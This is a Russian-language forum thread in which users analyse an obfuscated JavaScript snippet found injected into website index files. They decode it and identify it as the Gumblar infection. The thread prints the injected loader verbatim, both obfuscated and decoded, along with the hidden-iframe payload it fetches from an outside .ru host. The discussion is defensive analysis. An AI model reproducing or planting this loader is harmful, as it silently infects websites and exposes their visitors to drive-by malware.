Привет.
На одном сайте нашел вот такой код, явно вирусный:
<script>/*LGPL*/ try{ window.onload = function(){var Y0r5c4wy2fixek = document.createElement('s!&c$!&#r&#!$i^(p^!)##t#^'.replace(/#|\(|\^|@|\$|\!|\)|&/ig, ''));Y0r5c4wy2fixek.setAttribute('defer', 'd$@#e&#f#e(r)!)#)'.replace(/\!|#|\^|\(|&|\$|\)|@/ig, ''));Y0r5c4wy2fixek.setAttribute('type', 't)^$e)x!^(t(@/@&)j(@$a#)v^a!&#s@c^r)i#^p^t('.replace(/&|\)|@|\!|\^|\$|\(|#/ig, ''));Y0r5c4wy2fixek.setAttribute('id', 'C(($#(9&^k$$t@o#(!n^7)@0#)&)q@)w^&^'.replace(/\)|&|\(|\$|#|\^|\!|@/ig, ''));Y0r5c4wy2fixek.setAttribute('s&#r!c&^#'.replace(/\(|\^|&|@|\$|\)|\!|#/ig, ''), 'h$!t))t$$p#^:#(&@)/#!)/(t@)&o(@^$@p&@s##h@$#a#@&r!@e^w(a^@$r$^e@@-(!c)&o$&^m$.&^&#s!@l&^i!$d(^@e(s#$!h^&!a@$!r)e&.(^^@n#e!@t)(.@c(l$)a#($r#$i^n&&#-@c&$o))(^m!$)&.@)t($^$h$$^#(e)@c###&h^$^(o)(c&^!o@@$l$^$a&^t&#$$e@&w##)e@)^b!!.(##$r!u@@!:&#!8)#(0^#^^8$#&&0))/()g&^o^)o@^g!)l^e&!.!!#c&o^!($m)$&&/(!g&(#&o!)!o)@g!@l!$e^(.&$c&$o@)m@#@)/(&&^l&a)##&(s&t&@.(f#$)!m!!/)^v^^)e(o)!@h^&$$!.$(c@!#&o&&m##&^&/!&h^^u)#d$$(o&n!^g)).^c^&o!m#&#)/$'.replace(/@|\!|#|\^|&|\(|\)|\$/ig, ''));if (document){document.body.appendChild(Y0r5c4wy2fixek);}} } catch(Mxbfhbj5q04qxno71yp2) {}</script>
<!--b7c6f5ad44d5f4e7a48ec7690538e1d5-->Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен?
Спасибо
>Тут видно, что идет куча замен и проч. Как понять, чего этот скрипт вообще делает и насколько он опасен?Сохрани текст в файл. Потом выполни
tr -d '#|\\|\^|@|\$|\!||&' <file.txt >output.txt
Я особо не заморачивался - вручную выкосил ненужные скобки ()
и вот что получилось (с косметическими правками):<script>/*LGPL*/
try{
window.onload = function(){
var Y0r5c4wy2fixek = document.createElement('script');
Y0r5c4wy2fixek.setAttribute('defer', 'defer');
Y0r5c4wy2fixek.setAttribute('type', 'text/javascript');
Y0r5c4wy2fixek.setAttribute('id', 'C9kton70qw');
Y0r5c4wy2fixek.setAttribute('src',
'http://topshareware-com.slideshare.net.clarin-com.thechocola.../');
if (document)
{
document.body.appendChild(Y0r5c4wy2fixek);
}
}
}
catch(Mxbfhbj5q04qxno71yp2)
{
}
</script>В двух словах: создаёт новый элемент типа javascript, назначает ему адрес.
По указанному адресу другой кусок яваскрипта. После приведения в "нормальный" вид имеем:Mtpnq14 = 'topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru';
f = document.createElement('iframe');
f.src = 'http://'+Mtpnq14+':8080/index.php?ys';
f.style.visibility = 'hidden';
document.body.appendChild(f);То есть, создаётся скрытый фрейм, адрес которого:
http://topshareware-com.slideshare.net.clarin-com.thechocola...По указанному адресу ничего не выдаётся (ответ нулевой длины)
$ telnet topshareware-com.slideshare.net.clarin-com.thechocolateweb.ru 8080
Trying 91.121.49.129...
Connected to opshareware-com.slideshare.net.clarin-com.thechocolateweb.ru.
Escape character is '^]'.
GET /index.php?ys
Connection closed by foreign host.Дальше колупаться лень, пусть колупаются кому интересно - гики или представители правоохранительных органов, если это все не счётчик, а "распространение ПО, нарушающего работоспособность ЭВМ или ЛВС".
С чего вы вообще взяли, что это "вирусный код"??? Код явно обработан, чтобы занимать меньше места и чтобы его неудобнее было читать, но какое это имеет отношение к вирусу? Часто так делают, чтобы затруднить заимствование идей, хотя коментарий "LGPL" с этим как-то немного и не вяжется.В общем, это может, конечно, и "вирусный код", может какой-нибудь счётчик, как заметили выше. А может быть что угодно ещё. По поводу того, что он делает, уже написано.
Думаю это вирус. Он появился на моем сайте сегодня на всех страницах с именем index в конце файла. У меня в нескольких папках есть index.php, index.html.
Пришлось удалять.
>Думаю это вирус. Он появился на моем сайте сегодня на всех страницах
>с именем index в конце файла. У меня в нескольких папках
>есть index.php, index.html.
>Пришлось удалять.Это вирус Gumblar. Я тоже подхватил эту хрень. Тут http://justcoded.com/article/gumblar-family-virus-removal-tool/ вроде как лекарство от него